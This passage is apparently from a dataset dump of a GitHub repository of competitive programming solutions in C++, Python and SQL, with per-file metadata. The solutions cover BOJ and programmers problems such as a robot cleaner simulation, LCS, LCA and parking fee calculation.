== 1) arr[i] = arr[i-1] = 0;\n else if(arr[i+1] == 1) arr[i] = arr[i+1] = 0;\n }\n }\n \n for(int i = 1 ; i <= n ; i++){\n if(arr[i] > -1) answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.33221250772476196, "alphanum_fraction": 0.3665097653865814, "avg_line_length": 18.324674606323242, "blob_id": "8f699b2810ecd2d568366b40f8f44fa5a34e9b5a", "content_id": "18fc5c709ff21bd98ce55c9f5e3806aeb83b2891", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1575, "license_type": "no_license", "max_line_length": 79, "num_lines": 77, "path": "/BOJ/Implementation/14503.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14503번: 로봇 청소기\nDATE: 2022-02-04\nImplementation\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint n, m, ans;\nint arr[51][51];\nint dx[4] = {-1, 0, 1, 0}; \nint dy[4] = {0, 1, 0, -1};\nint x, y, d;\n\nint getDir(int d) {\n if(d == 0) return 3;\n else if(d == 1) return 0;\n else if(d == 2) return 1;\n else return 2;\n}\n\nvoid solve(){\n while(1){\n bool flag = false;\n\n if(!arr[x][y]){\n arr[x][y] = 2; // 청소 완료\n ans++;\n }\n \n for(int i = 0 ; i < 4 ; i++) {\n d = 
getDir(d);\n int nx = x + dx[d];\n int ny = y + dy[d];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || arr[nx][ny]) continue;\n \n x = nx;\n y = ny;\n flag = true;\n\n break;\n }\n\n if(!flag) { // 네 방향 모두 청소가 이미 되어있거나 벽인 경우\n int nd = (d + 2) % 4; // 후진 할 방향\n int nx = x + dx[nd];\n int ny = y + dy[nd];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m) continue;\n\n if(arr[nx][ny] != 1) { // 후진 가능 (방향은 그대로)\n x = nx;\n y = ny;\n }\n else return;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n cin >> x >> y >> d;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < m ; j++){\n cin >> arr[i][j];\n }\n }\n\n solve();\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.46423017978668213, "alphanum_fraction": 0.4914463460445404, "avg_line_length": 21.578947067260742, "blob_id": "31facdaec411a89c9401de3355cbcfbe22dae817", "content_id": "f5d2a432fa4856dfa0224912b149a19a11445794", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 90, "num_lines": 57, "path": "/BOJ/BFS_DFS/14226.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 14226번: 이모티콘\nDATE: 2021-01-25\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1001\nusing namespace std;\n\nint visited[MAX][MAX] = { 0, };\n\nint main()\n{\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n int s;\n cin >> s;\n\n queue<pair<int, int>> q; //(화면 출력 개수, 클립보드 개수)\n pair<int, int> p;\n\n q.push(make_pair(1, 0));\n visited[1][0] = 1;\n\n while (!q.empty())\n {\n p = q.front();\n int monitor = p.first;\n int cb = p.second;\n q.pop();\n\n if (monitor == s)\n {\n cout << visited[monitor][cb]-1;\n break;\n }\n \n if (!visited[monitor][monitor]) //화면에 있는 이모티콘을 모두 복사해서 클립보드에 저장\n {\n q.push(make_pair(monitor, monitor));\n visited[monitor][monitor] = visited[monitor][cb] + 1;\n }\n if (monitor + cb < MAX && !visited[monitor + cb][cb]) //클립보드에 있는 모든 이모티콘을 화면에 붙여넣기\n {\n q.push(make_pair(monitor + cb, cb));\n visited[monitor + cb][cb] = visited[monitor][cb] + 1;\n }\n if (monitor > 0 && !visited[monitor - 1][cb]) //화면에 있는 이모티콘 중 하나를 삭제\n {\n q.push(make_pair(monitor - 1, cb));\n visited[monitor - 1][cb] = visited[monitor][cb] + 1;\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4117647111415863, "alphanum_fraction": 0.46740859746932983, "avg_line_length": 16.027027130126953, "blob_id": "e38c3c9550ed1bfd175c8a0ae750ad94aa523fcf", "content_id": "9ef49084b4dc78aa8757fcac2423bcb1778dc90a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 687, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Graph Theory/17073.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 17073번: 나무 위의 빗물\nDATE: 2021-01-21\n*/\n#include <iostream>\n#include <queue>\n#define NODE_MAX 500000\n\nusing namespace std;\n\nint edge[NODE_MAX] = { 0, };\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n int n;\n double w, leaf=0;\n cin >> n >> w;\n\n for (int i = 0; i < n - 1; i++) {\n int u, v;\n cin >> u >> v;\n edge[u - 1]++;\n edge[v - 1]++;\n }\n\n for (int i = 1 ; i < n; i++) { \n if (edge[i] == 1) //부모 노드와만 연결 되었다면 leaf\n leaf++;\n }\n\n cout << fixed; //소수점 고정\n cout.precision(10); //소수점 10자리\n cout << w / leaf;\n\n return 0;\n}" }, { "alpha_fraction": 0.41525423526763916, "alphanum_fraction": 0.45338982343673706, "avg_line_length": 
16.830188751220703, "blob_id": "a6f1e8da0ae429b93595eff13f175e27b01111d8", "content_id": "de7b3bcc519d4ad65898fa18ad04bcceeeebdde3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 946, "license_type": "no_license", "max_line_length": 58, "num_lines": 53, "path": "/BOJ/Graph Theory/2252.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 2252번: 줄 세우기\n//2021-07-12\n//Topology Sort\n#include <iostream>\n#include <queue>\n#include <vector>\n#define MAX 100000\nusing namespace std;\n\nint n, inDegree[MAX];\nvector<int> v[MAX];\n\nvoid topologySort(){\n int result[n];\n queue<int> q;\n\n for(int i = 1 ; i <= n ; i++){\n if(inDegree[i] == 0) q.push(i);\n }\n\n for(int i = 0 ; i < n ; i++){\n int x = q.front();\n q.pop();\n result[i] = x;\n\n for(int j = 0 ; j < v[x].size() ; j++){\n int y = v[x][j];\n if(--inDegree[y] == 0) q.push(y);\n }\n }\n\n for(int i = 0 ; i < n ; i++){\n cout << result[i] << \" \";\n }\n\n return;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, num1, num2;\n cin >> n >> m;\n \n for(int i = 0 ; i < m ; i++){\n cin >> num1 >> num2;\n v[num1].push_back(num2);\n inDegree[num2]++;\n }\n\n topologySort();\n\n return 0;\n}" }, { "alpha_fraction": 0.4667896628379822, "alphanum_fraction": 0.5055350661277771, "avg_line_length": 14.970588684082031, "blob_id": "21774e653168188a8de49baa59d09b8aab518034", "content_id": "e04afa0a4b67c061ad5ebf3fb5014d83d8bc25f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 552, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/BOJ/Mathematics/1978.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1978번: 소수 찾기\nDATE: 2021-10-09\n*/\n#include <iostream>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nbool isPrime(int num) {\n if (num < 2) return false;\n\n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n\n return true;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num, cnt = 0;\n vector<int> v;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n if(isPrime(num)) cnt++;\n }\n\n cout << cnt;\n\n return 0;\n}" }, { "alpha_fraction": 0.37490609288215637, "alphanum_fraction": 0.41622841358184814, "avg_line_length": 18.02857208251953, "blob_id": "6736ff7e104355d61d2f86bf1b5957d1a592173f", "content_id": "863ad4f996ccae49e9aeb3e61078ad5037dcfe95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1373, "license_type": "no_license", "max_line_length": 58, "num_lines": 70, "path": "/BOJ/Implementation/1062.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1062번: 가르침\nDATE: 2021-10-20\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<string> words;\nint k, ans = 0;\nint alpha[26] = {0,};\n\nvoid combination(int depth, int next) {\n if(depth == k - 5) { //a n t i c를 제외한 조합\n int cnt = 0;\n\n for(int i = 0 ; i < words.size() ; i++) {\n bool flag = true;\n for(int j = 0 ; j < words[i].length() ; j++) {\n if(alpha[words[i][j] - 97] == 0){\n flag = false;\n break;\n }\n }\n if(flag) cnt++;\n }\n\n ans = max(ans, cnt);\n\n return;\n }\n\n for(int i = next ; i < 26 ; i++) {\n if(alpha[i] == 1) continue;\n\n alpha[i] = 1;\n combination(depth + 1, i + 1);\n alpha[i] = 0;\n }\n}\n\nint main() {\n 
ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n string word;\n cin >> n >> k;\n\n if(k < 5) { // 모든 단어가 a n t i c를 포함하므로\n cout << \"0\";\n return 0;\n }\n \n alpha['a' - 97] = 1;\n alpha['n' - 97] = 1;\n alpha['t' - 97] = 1;\n alpha['i' - 97] = 1;\n alpha['c' - 97] = 1;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> word;\n words.push_back(word);\n }\n \n combination(0, 0);\n\n cout << ans;\n \n return 0;\n}" }, { "alpha_fraction": 0.3930753469467163, "alphanum_fraction": 0.42362526059150696, "avg_line_length": 19.914894104003906, "blob_id": "a2dd1a8be42b32a64e2403d01f91076bf0ca7333", "content_id": "c058dcdab7efa0ededd0d42ff703908ac9a04d74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 988, "license_type": "no_license", "max_line_length": 88, "num_lines": 47, "path": "/BOJ/Graph Theory/1956.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1956번: 운동\nDATE: 2022-03-04\nFloyd-Warshall Algorithm\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 401\n#define INF 1e9\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int v, e;\n int a, b, c;\n int minVal = INF;\n cin >> v >> e;\n\n fill(&arr[0][0], &arr[v][v], INF);\n\n for(int i = 0 ; i < e ; i++){\n cin >> a >> b >> c;\n arr[a][b] = min(arr[a][b], c);\n }\n\n for(int k = 1 ; k <= v ; k++){\n for(int i = 1 ; i <= v ; i++){\n for(int j = 1 ; j <= v ; j++){\n if(arr[i][k] + arr[k][j] < arr[i][j]) arr[i][j] = arr[i][k] + arr[k][j];\n }\n }\n }\n\n for(int i = 1 ; i <= v ; i++){\n for(int j = 1 ; j <= v ; j++){\n if(i == j || arr[i][j] == INF) continue;\n minVal = min(minVal, arr[i][j] + arr[j][i]);\n }\n }\n\n if(minVal == INF) cout << -1;\n else cout << minVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.41017964482307434, "alphanum_fraction": 0.46856287121772766, "avg_line_length": 16.153846740722656, "blob_id": "23905d28da44ea5ab3322df6ee88cb7199e65287", "content_id": "609f012791f7c6980433af6d885ce9532ff512c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 676, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Two Pointer/1806.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1806번: 부분합\nDATE: 2021-06-01\nTwo Pointer\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint arr[100001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int start=0, end=0, sum=0;\n int length = 100001;\n int n, s;\n cin >> n >> s;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n while(end <= n){\n if(sum >= s){\n int dst = end - start;\n length = min(length, dst);\n\n sum -= arr[start++];\n }\n else if(sum < s){\n sum += arr[end++];\n }\n }\n\n if(length == 100001) cout << 0;\n else cout << length;\n\n return 0;\n}" }, { "alpha_fraction": 0.4037266969680786, "alphanum_fraction": 0.4551907777786255, "avg_line_length": 21.559999465942383, "blob_id": "2037299183fdc0ec4ee230242b90073acdf65cde", "content_id": "6d969e199330fb7a0d14ecc50dcbf7ed68f0aaa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1129, "license_type": "no_license", "max_line_length": 75, "num_lines": 50, "path": "/BOJ/Dynamic Programming/9252.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9252번: LCS 2\nDATE: 2022-02-16\nDynamic Programming (Longest Common 
Subsequence)\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint dp[1001][1001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str1, str2;\n cin >> str1 >> str2;\n\n for(int i = 1 ; i <= str2.length() ; i++){\n for(int j = 1 ; j <= str1.length() ; j++){\n if(str2[i - 1] == str1[j - 1]) dp[i][j] = dp[i - 1][j - 1] + 1;\n else dp[i][j] = max(dp[i - 1][j] , dp[i][j - 1]);\n }\n }\n\n int length = dp[str2.length()][str1.length()];\n cout << length << '\\n';\n\n if(length == 0) return 0;\n \n char ans[length];\n int i = str2.length(), j = str1.length();\n int idx = 0, num = length;\n\n while(1){\n if(num == 0) break;\n\n if(num == dp[i][j - 1]) j--;\n else if(num == dp[i - 1][j]) i--;\n else {\n ans[idx++] = str1[j - 1];\n num = dp[i - 1][j - 1];\n i--; \n j--;\n }\n }\n\n reverse(ans, ans + length);\n for(int i = 0 ; i < length ; i++) cout << ans[i];\n\n return 0;\n}" }, { "alpha_fraction": 0.4708029329776764, "alphanum_fraction": 0.5054744482040405, "avg_line_length": 20.115385055541992, "blob_id": "b7ee071af63d6675692a5ba32c8c8b47f3f7a792", "content_id": "9c63d38aa7cbbd0df70a9809d0d1aa276819293c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 560, "license_type": "no_license", "max_line_length": 86, "num_lines": 26, "path": "/programmers/Level 2/english_shiritori.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 영어 끝말잇기\nDATE: 2022-06-14\n*/\n#include <string>\n#include <vector>\n#include <iostream>\n#include <map>\nusing namespace std;\n\nvector<int> solution(int n, vector<string> words) {\n vector<int> answer(2, 0);\n map<string, int> word;\n\n for(int i = 0 ; i < words.size() ; i++){\n if(word[words[i]] > 0 || (i > 0 && words[i - 1].back() != words[i].front())) {\n answer[0] = i % n + 1;\n answer[1] = i / n + 1;\n break;\n }\n \n word[words[i]]++;\n }\n\n return answer;\n}" }, { "alpha_fraction": 0.3958539068698883, "alphanum_fraction": 0.45607107877731323, "avg_line_length": 22.581396102905273, "blob_id": "16a086e3fd78e97555798c4423f493a8aa1cffe3", "content_id": "a0cda88e76dbbf61b0e6b5096639d4957e31e4ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 94, "num_lines": 43, "path": "/programmers/Level 1/crane_doll_draw_game.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1 : Crane doll draw game\n//2019 KAKAO Winter Internship\n//2021-05-07\n#include <string>\n#include <vector>\n#include <iostream>\n\nusing namespace std;\n\nint solution(vector<vector<int>> board, vector<int> moves) {\n int answer = 0;\n vector<int> v;\n \n for(int i = 0 ; i < moves.size() ; i++){\n for(int j = 0 ; j < board.size() ; j++){\n if(board[j][moves[i] - 1] > 0){\n v.push_back(board[j][moves[i] - 1]);\n board[j][moves[i] - 1] = 0;\n break;\n }\n } \n }\n \n for(int i = 0 ; i < v.size() ; i++){\n if(v[i] == v[i - 1]){\n answer += 2;\n v.erase(v.begin() + (i - 1) , v.begin() + (i + 1));\n i-=2;\n }\n }\n \n return answer;\n}\n\nint main(){\n vector<vector<int>> board = {{0,0,0,0,0},{0,0,1,0,3},{0,2,5,0,1},{4,2,4,4,2},{3,5,1,3,1}};\n vector<int> moves = {1,5,3,5,1,2,1,4};\n\n int num = solution(board, moves);\n cout << num;\n\n return 0;\n}" }, { "alpha_fraction": 0.40674155950546265, "alphanum_fraction": 0.449438214302063, "avg_line_length": 12.9375, "blob_id": 
"85ee0f357f3eedcef2476ab1cd3116a0efd34378", "content_id": "cb82b4710a7318f8d18f18d5c13d3c2bbd8c279c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 451, "license_type": "no_license", "max_line_length": 58, "num_lines": 32, "path": "/BOJ/Implementation/2161.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2161번: 카드1\n2021-03-30\n*/\n#include <iostream>\n#include <queue>\n\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n queue <int> q;\n\n int n;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n q.push(i);\n }\n\n while(!(q.size() == 1)){\n cout << q.front() << \" \";\n q.pop();\n\n q.emplace(q.front()); \n q.pop();\n }\n\n cout << q.front();\n\n return 0;\n}" }, { "alpha_fraction": 0.48491379618644714, "alphanum_fraction": 0.5387930870056152, "avg_line_length": 17.600000381469727, "blob_id": "e265e134d823d7e3e5861b4d0c9e02d07cd3be2f", "content_id": "bd307f6a0588a1d5dc4d8c1599417824068ac7c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 474, "license_type": "no_license", "max_line_length": 58, "num_lines": 25, "path": "/BOJ/Implementation/10818_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10818번: 최소, 최대 \n2021-03-30\nmin, max ver\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 1000000\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, input, min_num = MAX, max_num = -MAX;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> input;\n min_num = min(min_num, input);\n max_num = max(max_num, input);\n }\n\n cout << min_num << \" \" << max_num;\n\n return 0;\n}" }, { "alpha_fraction": 0.3973214328289032, "alphanum_fraction": 0.4188988208770752, "avg_line_length": 17.943662643432617, "blob_id": "53a9975f7e40202dbe0b07e8a13d730967ddc5fe", "content_id": "ea638679ec7727a471555610c377ececd9509aee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1380, "license_type": "no_license", "max_line_length": 58, "num_lines": 71, "path": "/BOJ/Graph Theory/11437.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11438번: LCA\nDATE: 2021-07-13\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 100001\nusing namespace std;\n\nvector<int> v[MAX];\nint depth[MAX], parent[MAX];\nint n, m;\n\nvoid bfs(int parentNode, int curDepth){\n queue<int> q;\n q.push(parentNode);\n\n while(!q.empty()){\n int qsize = q.size();\n for(int i = 0 ; i < qsize ; i++){\n int curNode = q.front();\n depth[curNode] = curDepth;\n q.pop();\n\n for(int nextNode : v[curNode]){\n if(depth[nextNode] == 0){\n parent[nextNode] = curNode;\n q.push(nextNode);\n }\n }\n }\n curDepth++;\n }\n\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b;\n cin >> n;\n \n for(int i = 1 ; i < n ; i++){\n cin >> a >> b;\n v[a].push_back(b);\n v[b].push_back(a);\n }\n\n bfs(1, 1);\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b;\n\n //a의 레벨 > b의 레벨\n if(depth[a] < depth[b]) swap(a, b);\n \n while(depth[a] != depth[b]) {\n a = parent[a]; //레벨이 같아질 때까지 갱신\n }\n while(a != b){\n a = parent[a];\n b = parent[b]; \n }\n\n cout << b << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.426858514547348, "alphanum_fraction": 0.5179855823516846, "avg_line_length": 13.928571701049805, "blob_id": 
"05c4543f8183fe768929700f65736c38d6a5c362", "content_id": "021ff82f6b6c3b56abe6bff4f61e775d162f12c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 423, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/BOJ/Dynamic Programming/1904.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1904번: 01타일\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\n#define MOD 15746\n#define MAX 1000001\nusing namespace std;\n\nlong long dp[MAX] = {0,};\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n dp[1] = 1;\n dp[2] = 2;\n\n for(int i = 3 ; i <= n ; i++){\n dp[i] = (dp[i - 2] + dp[i - 1]) % MOD;\n }\n\n cout << dp[n];\n\n return 0;\n}" }, { "alpha_fraction": 0.4681440591812134, "alphanum_fraction": 0.5235456824302673, "avg_line_length": 15.454545021057129, "blob_id": "ada2079fba5224f2a90392dc1b29d8b194e9be03", "content_id": "6bedca41feaeb6170d445d89f2b5d25085257da6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 367, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/BOJ/Implementation/10817.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 10817번: 세 수\n//2021-05-04\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n vector<int> v;\n\n for(int i = 0 ; i < 3 ; i++){\n cin >> n;\n v.push_back(n);\n }\n\n sort(v.begin(), v.end());\n cout << v[1];\n\n return 0;\n}" }, { "alpha_fraction": 0.440443217754364, "alphanum_fraction": 0.4764542877674103, "avg_line_length": 19.11111068725586, "blob_id": "64d9598ec5622330ad19c3fbced3d2290ebb0eb0", "content_id": "c588e35a01fc4b301637539a0ad7f7c272a15922", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 377, "license_type": "no_license", "max_line_length": 38, "num_lines": 18, "path": "/programmers/Level 1/incomplete_player.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 완주하지 못한 선수\n# date: 2022-04-15\ndef solution(participant, completion):\n answer = ''\n dic = {}\n \n for x in participant:\n dic[x] = dic.get(x, 0) + 1\n \n for x in completion:\n dic[x] -= 1\n \n for k, v in dic.items():\n if v == 1:\n answer = k\n break\n \n return answer" }, { "alpha_fraction": 0.486679345369339, "alphanum_fraction": 0.5099905133247375, "avg_line_length": 22.10988998413086, "blob_id": "44b6b144e47271dab9cfafb02e30fa13a0370d38", "content_id": "cba1910d35a385179ad41be766338fbfd5bab0c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2156, "license_type": "no_license", "max_line_length": 82, "num_lines": 91, "path": "/programmers/Level 2/parking_fee_calculation.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 주차 요금 계산\n2022 KAKAO BLIND RECRUITMENT\nDATE: 2022-04-02\n*/\n#include <string>\n#include <vector>\n#include <map>\n#include <sstream>\n#include <algorithm>\n#include <cmath>\nusing namespace std;\n\nvector<string> split(string str, char del){\n vector<string> ret;\n istringstream iss(str);\n string buffer;\n \n while(getline(iss, buffer, del)) ret.push_back(buffer);\n \n return ret;\n}\n\nint calcTime(string in, string out){\n int idx, time = 0;\n \n idx = in.find(':');\n 
int in_hour = stoi(in.substr(0, idx));\n int in_min = stoi(in.substr(idx + 1));\n \n idx = out.find(':');\n int out_hour = stoi(out.substr(0, idx));\n int out_min = stoi(out.substr(idx + 1));\n \n if(in_min > out_min){\n time += 60 - in_min + out_min;\n time += (out_hour - in_hour - 1) * 60;\n }\n else{\n time += out_min - in_min;\n time += (out_hour - in_hour) * 60;\n }\n \n return time;\n}\n\nvector<int> solution(vector<int> fees, vector<string> records) {\n vector<int> answer;\n map<string, string> m1;\n map<string, int> m2;\n \n for(auto i : records){\n vector<string> ret = split(i, ' ');\n string car = ret[1];\n \n if(m1.find(car) != m1.end()){\n int time = calcTime(m1[car], ret[0]);\n \n m2[car] += time;\n m1.erase(car);\n } \n else m1[car] = ret[0]; \n }\n \n for(auto i : m1) { // 입차 기록은 존재하는데 출차 기록이 없는 차들 계산\n string car = i.first;\n string in = i.second;\n string out = \"23:59\";\n \n int time = calcTime(in, out);\n m2[car] += time;\n }\n\n vector<pair<string, int>> tmp;\n\n for(auto i : m2){\n string car = i.first;\n int total = i.second;\n\n if(total <= fees[0]) tmp.push_back({car, fees[1]});\n else{\n int fee = fees[1] + ceil(double(total - fees[0]) / fees[2]) * fees[3];\n tmp.push_back({car, fee});\n }\n }\n \n sort(tmp.begin(), tmp.end());\n for(auto i : tmp) answer.push_back(i.second);\n \n return answer;\n}" }, { "alpha_fraction": 0.6355311274528503, "alphanum_fraction": 0.6849817037582397, "avg_line_length": 17.827587127685547, "blob_id": "6c1b95791ffb5844b7334560701cd31c0c4cf11f", "content_id": "0ba6fc02748e8084178eb7bb26f5b4333cbb3452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 598, "license_type": "no_license", "max_line_length": 91, "num_lines": 29, "path": "/programmers/SQL/IS NULL.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# IS NULL\n\n**[1. 이름이 없는 동물의 아이디 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59039)**\n\n```sql\nSELECT ANIMAL_ID\nFROM ANIMAL_INS\nWHERE NAME IS NULL\n```\n\n<br/>\n\n**[2. 이름이 있는 동물의 아이디 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59407)**\n\n```sql\nSELECT ANIMAL_ID\nFROM ANIMAL_INS\nWHERE NAME IS NOT NULL\n```\n\n<br/>\n\n**[3. 
NULL 처리하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59410)**\n\n```sql\nSELECT ANIMAL_TYPE, IFNULL(NAME, 'No name') AS NAME, SEX_UPON_INTAKE\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n" }, { "alpha_fraction": 0.5125628113746643, "alphanum_fraction": 0.5427135825157166, "avg_line_length": 16.08571434020996, "blob_id": "ab72bd1760a2b00771075eea0cd3d4a60d8d85a9", "content_id": "5fdb35e0b0b6ac0f0f478d35450e5750bf2f5038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 603, "license_type": "no_license", "max_line_length": 58, "num_lines": 35, "path": "/BOJ/Implementation/2503.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2503번: 카드\nDATE: 2022-03-11\n*/\n#include <iostream>\n#include <map>\n#include <vector>\n#include <algorithm>\n#define ll long long\nusing namespace std;\n\nmap<ll, ll> m;\n\nbool cmp(pair<ll,ll> a, pair<ll,ll> b){\n if(a.second == b.second) return a.first < b.first;\n return a.second > b.second;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n ll n, a;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> a;\n m[a]++;\n }\n\n vector<pair<ll,ll>> v(m.begin(), m.end());\n sort(v.begin(), v.end(), cmp);\n\n cout << v[0].first;\n\n return 0;\n}" }, { "alpha_fraction": 0.39282429218292236, "alphanum_fraction": 0.4351426064968109, "avg_line_length": 19.923076629638672, "blob_id": "4af821d581c24ae5e9717fda2ed02817845a4d17", "content_id": "8a8d819fd9bf77f4b7ea7a0e2405d6346ca364a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1275, "license_type": "no_license", "max_line_length": 83, "num_lines": 52, "path": "/BOJ/Divide And Conquer/1992.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1992번: 쿼드트리\nDATE: 2022-02-14\nDivide And Conquer\n-\n0. 인자로 받은 (x, y)의 숫자로 체크함\n1. 해당 범위의 모든 수가 동일 => 숫자 출력\n2. 다른 수가 존재한다면 => 4등분해서 재귀\n 2-1. 재귀 전 여는 괄호, 끝난 후 닫는 괄호\n 2-2. 
